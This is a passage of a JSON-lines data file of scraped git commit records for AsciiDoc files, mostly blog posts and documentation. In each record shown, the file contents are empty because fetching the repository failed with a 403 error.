962\/elasticsearch,martinstuga\/elasticsearch,ESamir\/elasticsearch,Shekharrajak\/elasticsearch,ouyangkongtong\/elasticsearch,Widen\/elasticsearch,cwurm\/elasticsearch,ulkas\/elasticsearch,mjhennig\/elasticsearch,sdauletau\/elasticsearch,lydonchandra\/elasticsearch,yongminxia\/elasticsearch,ImpressTV\/elasticsearch,gingerwizard\/elasticsearch,xuzha\/elasticsearch,Stacey-Gammon\/elasticsearch,HarishAtGitHub\/elasticsearch,mohit\/elasticsearch,F0lha\/elasticsearch,nknize\/elasticsearch,bawse\/elasticsearch,fred84\/elasticsearch,ouyangkongtong\/elasticsearch,ulkas\/elasticsearch,polyfractal\/elasticsearch,lzo\/elasticsearch-1,mgalushka\/elasticsearch,abibell\/elasticsearch,mute\/elasticsearch,trangvh\/elasticsearch,lks21c\/elasticsearch,Siddartha07\/elasticsearch,lchennup\/elasticsearch,achow\/elasticsearch,mcku\/elasticsearch,kaneshin\/elasticsearch,kevinkluge\/elasticsearch,fekaputra\/elasticsearch,lzo\/elasticsearch-1,gfyoung\/elasticsearch,vroyer\/elasticassandra,uschindler\/elasticsearch,ivansun1010\/elasticsearch,dylan8902\/elasticsearch,dongjoon-hyun\/elasticsearch,sc0ttkclark\/elasticsearch,mjhennig\/elasticsearch,Uiho\/elasticsearch,zhiqinghuang\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,yanjunh\/elasticsearch,avikurapati\/elasticsearch,djschny\/elasticsearch,yynil\/elasticsearch,hirdesh2008\/elasticsearch,jbertouch\/elasticsearch,EasonYi\/elasticsearch,strapdata\/elassandra,humandb\/elasticsearch,amit-shar\/elasticsearch,pranavraman\/elasticsearch,F0lha\/elasticsearch,GlenRSmith\/elasticsearch,pozhidaevak\/elasticsearch,yynil\/elasticsearch,brandonkearby\/elasticsearch,camilojd\/elasticsearch,beiske\/elasticsearch,zkidkid\/elasticsearch,sneivandt\/elasticsearch,Shekharrajak\/elasticsearch,pritishppai\/elasticsearch,MetSystem\/elasticsearch,markwalkom\/elasticsearch,mnylen\/elasticsearch,zeroctu\/elasticsearch,dylan8902\/elasticsearch,hydro2k\/elasticsearch,AndreKR\/elasticsearch,drewr\/elasticsearch,wayeast\/elasticsearch,glefloch\/elasticsearch,sposam\/elasticsearch,liweinan0423\/elasticsearch,IanvsPoplicola\/elasticsearch,drewr\/elasticsearch,Stacey-Gammon\/elasticsearch,ricardocerq\/elasticsearch,ZTE-PaaS\/elasticsearch,gingerwizard\/elasticsearch,Rygbee\/elasticsearch,mute\/elasticsearch,wbowling\/elasticsearch,AndreKR\/elasticsearch,jango2015\/elasticsearch,hafkensite\/elasticsearch,franklanganke\/elasticsearch,camilojd\/elasticsearch,sarwarbhuiyan\/elasticsearch,nrkkalyan\/el
asticsearch,HarishAtGitHub\/elasticsearch,masterweb121\/elasticsearch,rlugojr\/elasticsearch,himanshuag\/elasticsearch,s1monw\/elasticsearch,rento19962\/elasticsearch,humandb\/elasticsearch,abibell\/elasticsearch,himanshuag\/elasticsearch,MichaelLiZhou\/elasticsearch,markwalkom\/elasticsearch,Chhunlong\/elasticsearch,schonfeld\/elasticsearch,bestwpw\/elasticsearch,mcku\/elasticsearch,likaiwalkman\/elasticsearch,girirajsharma\/elasticsearch,springning\/elasticsearch,beiske\/elasticsearch,bestwpw\/elasticsearch,spiegela\/elasticsearch,liweinan0423\/elasticsearch,mm0\/elasticsearch,naveenhooda2000\/elasticsearch,episerver\/elasticsearch,JSCooke\/elasticsearch,MichaelLiZhou\/elasticsearch,fforbeck\/elasticsearch,nrkkalyan\/elasticsearch,sreeramjayan\/elasticsearch,robin13\/elasticsearch,xuzha\/elasticsearch,nrkkalyan\/elasticsearch,fred84\/elasticsearch,MetSystem\/elasticsearch,tebriel\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,yynil\/elasticsearch,vingupta3\/elasticsearch,lchennup\/elasticsearch,ulkas\/elasticsearch,mapr\/elasticsearch,Widen\/elasticsearch,lightslife\/elasticsearch,zkidkid\/elasticsearch,hafkensite\/elasticsearch,sc0ttkclark\/elasticsearch,nrkkalyan\/elasticsearch,scottsom\/elasticsearch,mute\/elasticsearch,yongminxia\/elasticsearch,vroyer\/elassandra,HonzaKral\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,hanswang\/elasticsearch,wbowling\/elasticsearch,Ansh90\/elasticsearch,zeroctu\/elasticsearch,nezirus\/elasticsearch,Rygbee\/elasticsearch,wangtuo\/elasticsearch,wimvds\/elasticsearch,nezirus\/elasticsearch,vingupta3\/elasticsearch,socialrank\/elasticsearch,vietlq\/elasticsearch,dylan8902\/elasticsearch,lydonchandra\/elasticsearch,a2lin\/elasticsearch,dylan8902\/elasticsearch,ImpressTV\/elasticsearch,diendt\/elasticsearch,nezirus\/elasticsearch,btiernay\/elasticsearch,s1monw\/elasticsearch,Siddartha07\/elasticsearch,pritishppai\/elasticsearch,andrestc\/elasticsearch,vietlq\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Stacey-Gammon\/elasticsearch,lightslife\/elasticsearch,uschindler\/elasticsearch,vroyer\/elasticassandra,jchampion\/elasticsearch,rhoml\/elasticsearch,kenshin233\/elasticsearch,Uiho\/elasticsearch,C-Bish\/elasticsearch,mbrukman\/elasticsearch,beiske\/elasticsearch,henakamaMSFT\/elasticsearch,fforbeck\/elasticsearch,knight1128\/elasticsearch,lmtwga\/elasticsearch,fernandozhu\/elasticsearch,himanshuag\/elasticsearch,henakamaMSFT\/elasticsearch,sposam\/elasticsearch,apepper\/elasticsearch,humandb\/elasticsearch,btiernay\/elasticsearch,infusionsoft\/elasticsearch,hanswang\/elasticsearch,Shekharrajak\/elasticsearch,kingaj\/elasticsearch,dongjoon-hyun\/elasticsearch,wbowling\/elasticsearch,LewayneNaidoo\/elasticsearch,onegambler\/elasticsearch,kaneshin\/elasticsearch,jpountz\/elasticsearch,kalimatas\/elasticsearch,karthikjaps\/elasticsearch,camilojd\/elasticsearch,18098924759\/elasticsearch,rlugojr\/elasticsearch,kalburgimanjunath\/elasticsearch,amit-shar\/elasticsearch,cnfire\/elasticsearch-1,franklanganke\/elasticsearch,franklanganke\/elasticsearch,ouyangkongtong\/elasticsearch,adrianbk\/elasticsearch,nazarewk\/elasticsearch,JervyShi\/elasticsearch,kunallimaye\/elasticsearch,ZTE-PaaS\/elasticsearch,F0lha\/elasticsearch,pranavraman\/elasticsearch,luiseduardohdbackup\/elasticsearch,nezirus\/elasticsearch,truemped\/elasticsearch,strapdata\/elassandra-test,IanvsPoplicola\/elasticsearch,mapr\/elasticsearch,vingupta3\/elasticsearch,mmaracic\/elasticsearch,petabytedata\/elasticsearch,yongminxia\/elasticsearch,zeroctu\/elasticsearch,rhoml\/elasticsearch,h
uanzhong\/elasticsearch,Siddartha07\/elasticsearch,jango2015\/elasticsearch,pablocastro\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,cnfire\/elasticsearch-1,rajanm\/elasticsearch,wuranbo\/elasticsearch,caengcjd\/elasticsearch,jeteve\/elasticsearch,djschny\/elasticsearch,ouyangkongtong\/elasticsearch,yongminxia\/elasticsearch,Uiho\/elasticsearch,naveenhooda2000\/elasticsearch,episerver\/elasticsearch,sreeramjayan\/elasticsearch,springning\/elasticsearch,spiegela\/elasticsearch,scorpionvicky\/elasticsearch,mikemccand\/elasticsearch,ckclark\/elasticsearch,andrejserafim\/elasticsearch,mcku\/elasticsearch,xingguang2013\/elasticsearch,likaiwalkman\/elasticsearch,caengcjd\/elasticsearch,mapr\/elasticsearch,dpursehouse\/elasticsearch,hydro2k\/elasticsearch,jpountz\/elasticsearch,wenpos\/elasticsearch,jbertouch\/elasticsearch,qwerty4030\/elasticsearch,weipinghe\/elasticsearch,humandb\/elasticsearch,ImpressTV\/elasticsearch,knight1128\/elasticsearch,Charlesdong\/elasticsearch,adrianbk\/elasticsearch,vietlq\/elasticsearch,iacdingping\/elasticsearch,MisterAndersen\/elasticsearch,kunallimaye\/elasticsearch,mjhennig\/elasticsearch,obourgain\/elasticsearch,F0lha\/elasticsearch,cnfire\/elasticsearch-1,mnylen\/elasticsearch,liweinan0423\/elasticsearch,polyfractal\/elasticsearch,bawse\/elasticsearch,apepper\/elasticsearch,iantruslove\/elasticsearch,TonyChai24\/ESSource,YosuaMichael\/elasticsearch,mnylen\/elasticsearch,MichaelLiZhou\/elasticsearch,JSCooke\/elasticsearch,yynil\/elasticsearch,sneivandt\/elasticsearch,girirajsharma\/elasticsearch,queirozfcom\/elasticsearch,infusionsoft\/elasticsearch,lightslife\/elasticsearch,henakamaMSFT\/elasticsearch,tkssharma\/elasticsearch,Rygbee\/elasticsearch,liweinan0423\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,mgalushka\/elasticsearch,Helen-Zhao\/elasticsearch,YosuaMichael\/elasticsearch,yuy168\/elasticsearch,iantruslove\/elasticsearch,fforbeck\/elasticsearch","old_file":"docs\/reference\/cluster\/reroute.asciidoc","new_file":"docs\/reference\/cluster\/reroute.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d83a679b27975cadcbc2b42053ef1c086f147562","subject":"Update 2018-03-08-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-02.adoc","message":"Update 2018-03-08-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-02.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2018-03-08-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-02.adoc","new_file":"_posts\/2018-03-08-Building-Web-Component-based-Progressive-Web-App-in-Stencil-JS-Part-02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c9065459fda64d88d44decf72c19f6f81b6ce5f","subject":"Publish 20161110-1232-showoff-zone.adoc","message":"Publish 
20161110-1232-showoff-zone.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone.adoc","new_file":"20161110-1232-showoff-zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cde0710042b7bba77c988e8dbce1e62df05c5a7","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31613120c4ade12e3e963ecedbb2e1da47d85bb3","subject":"Update 2017-02-25.adoc","message":"Update 2017-02-25.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-02-25.adoc","new_file":"_posts\/2017-02-25.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9c5c8e606611609d247de13beb8bc013c4db894","subject":"Update 2015-02-09-A-new-blog.adoc","message":"Update 2015-02-09-A-new-blog.adoc","repos":"ludolphus\/hubpress.io,ludolphus\/hubpress.io,ludolphus\/hubpress.io","old_file":"_posts\/2015-02-09-A-new-blog.adoc","new_file":"_posts\/2015-02-09-A-new-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ludolphus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60040bc07f55e36da74c15508a515c5b97a5cff4","subject":"Create 2016-11-24-FIRST-Post.adoc","message":"Create 2016-11-24-FIRST-Post.adoc","repos":"Evolution2626\/blog,Evolution2626\/blog,Evolution2626\/blog,Evolution2626\/blog","old_file":"_posts\/2016-11-24-FIRST-Post.adoc","new_file":"_posts\/2016-11-24-FIRST-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Evolution2626\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cf492a87dfc821915210896edac2f54a623264a","subject":"y2b create post Wireless + Mechanical - Is This Real Life?","message":"y2b create post Wireless + Mechanical - Is This Real Life?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-03-06-Wireless--Mechanical--Is-This-Real-Life.adoc","new_file":"_posts\/2015-03-06-Wireless--Mechanical--Is-This-Real-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c9c8f7be72a6c431d4edf52c6ac944c157ec0fa","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 
2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8825c99f32860120af9e2d8a6f8100e8fefb974","subject":"YKCS11: added release notes.","message":"YKCS11: added release notes.\n","repos":"Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/YKCS11_release_notes.adoc","new_file":"doc\/YKCS11_release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d2054467839fd631b855c56d845c7b910ec0ae78","subject":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68241c6f1fb9f5f5254310f0a86fa40992ad44c3","subject":"Create 2016-05-21-New-Dawn.adoc","message":"Create 2016-05-21-New-Dawn.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-21-New-Dawn.adoc","new_file":"_posts\/2016-05-21-New-Dawn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3874f5768273098c819d4cba8fc81b0a8814b1cb","subject":"Update 2017-09-01-Ethereum.adoc","message":"Update 2017-09-01-Ethereum.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-Ethereum.adoc","new_file":"_posts\/2017-09-01-Ethereum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80196e734d9b6fe0ed450b0a17bb6e3de2b39c0b","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 
2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1be3ecf5a23574da317667a604117793552957d4","subject":"Update 2019-03-18-.adoc","message":"Update 2019-03-18-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-18-.adoc","new_file":"_posts\/2019-03-18-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98195803dde1a0a5455af4754bb8b18bebb917f5","subject":"started documentation","message":"started documentation","repos":"oss-ethinking\/amajza","old_file":"amajza-json\/README.adoc","new_file":"amajza-json\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oss-ethinking\/amajza.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ed6f50d26bd28c5bc51b4ed87c9323da71c9791","subject":"Publish 2017-02-23.adoc","message":"Publish 2017-02-23.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"2017-02-23.adoc","new_file":"2017-02-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94920b3a7d75692d24dedc32d90d64c3d4268f70","subject":"Update 2015-05-01-Mein-erster-Eintrag.adoc","message":"Update 2015-05-01-Mein-erster-Eintrag.adoc","repos":"pointout\/pointout.github.io,pointout\/pointout.github.io,pointout\/pointout.github.io","old_file":"_posts\/2015-05-01-Mein-erster-Eintrag.adoc","new_file":"_posts\/2015-05-01-Mein-erster-Eintrag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pointout\/pointout.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b4c8313bfaa56a57fe0f49371b8d99a8f7420fd","subject":"Update 2016-03-30-Subiendo-el-exploit.adoc","message":"Update 2016-03-30-Subiendo-el-exploit.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_file":"_posts\/2016-03-30-Subiendo-el-exploit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5e22639fa46461d11e031c73fbc73f9f7021cc1","subject":"y2b create post TOASTING WITH GLASS","message":"y2b create post TOASTING WITH 
GLASS","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-21-TOASTING-WITH-GLASS.adoc","new_file":"_posts\/2016-06-21-TOASTING-WITH-GLASS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"428f04e724071be00f1a738ea1ac0f8bb5db262c","subject":"Update 2017-03-15-Development-Setting.adoc","message":"Update 2017-03-15-Development-Setting.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-03-15-Development-Setting.adoc","new_file":"_posts\/2017-03-15-Development-Setting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d7c9c8772e54bf461d2faeb876b4c3e97b6faf4","subject":"Create Keyplayers.adoc","message":"Create Keyplayers.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Keyplayers.adoc","new_file":"Keyplayers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"47393bd0ccc83741830de2388edc4d24174b2755","subject":"add cloju.ru","message":"add cloju.ru\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/clojuru.adoc","new_file":"content\/events\/2019\/clojuru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f45f5607042d6d5003b328ebd0e70de140c37308","subject":"Update 2015-02-06-Blog-Easily-with-HubPress.adoc","message":"Update 2015-02-06-Blog-Easily-with-HubPress.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-02-06-Blog-Easily-with-HubPress.adoc","new_file":"_posts\/2015-02-06-Blog-Easily-with-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9a5b40d1846f772f638344fdfd1c39baf8512e3","subject":"Update 2016-06-29-PHP-CSV.adoc","message":"Update 2016-06-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-06-29-PHP-CSV.adoc","new_file":"_posts\/2016-06-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f92bb1daca92c72e615703647f34d2e3eb8774b","subject":"Update 
2016-10-15-Teste-2.adoc","message":"Update 2016-10-15-Teste-2.adoc","repos":"diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io,diogoan\/diogoan.github.io","old_file":"_posts\/2016-10-15-Teste-2.adoc","new_file":"_posts\/2016-10-15-Teste-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diogoan\/diogoan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65e2b496992064fbb2ea89f5d906fdbb8bfbf1f7","subject":"Update 2017-08-19-Prepare.adoc","message":"Update 2017-08-19-Prepare.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-08-19-Prepare.adoc","new_file":"_posts\/2017-08-19-Prepare.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03a22e0c2bf603640fd76cb71a2859c9367ebbe3","subject":"cleaning up the flow","message":"cleaning up the flow\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f286d3b318d50d8a27115de2f6c7518c078a42a","subject":"Update 2015-11-02-Read-only-master-branch.adoc","message":"Update 2015-11-02-Read-only-master-branch.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2015-11-02-Read-only-master-branch.adoc","new_file":"_posts\/2015-11-02-Read-only-master-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0541c5544bb5196a4aacd340834c0355daf72b41","subject":"Update 2017-08-07-Drowning-in-Java-Script.adoc","message":"Update 2017-08-07-Drowning-in-Java-Script.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-07-Drowning-in-Java-Script.adoc","new_file":"_posts\/2017-08-07-Drowning-in-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d1eeab2bd469e66eced3b52598cc881c9180bce","subject":"Adding adoc for custom input","message":"Adding adoc for custom input\n","repos":"vaadin\/vaadin-date-picker,vaadin\/vaadin-date-picker","old_file":"docs\/vaadin-date-picker-customization.adoc","new_file":"docs\/vaadin-date-picker-customization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/vaadin-date-picker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"a25f4dd95d73830904d2edb08fc57a6bad32f02a","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9190b80d3b57cd09d03329532501864be6da707b","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32046e6d4af34aee68bab5c804527ab80e21f6f3","subject":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","message":"Update 2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_file":"_posts\/2016-11-30-A-W-S-re-Invent2016re-Invent2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 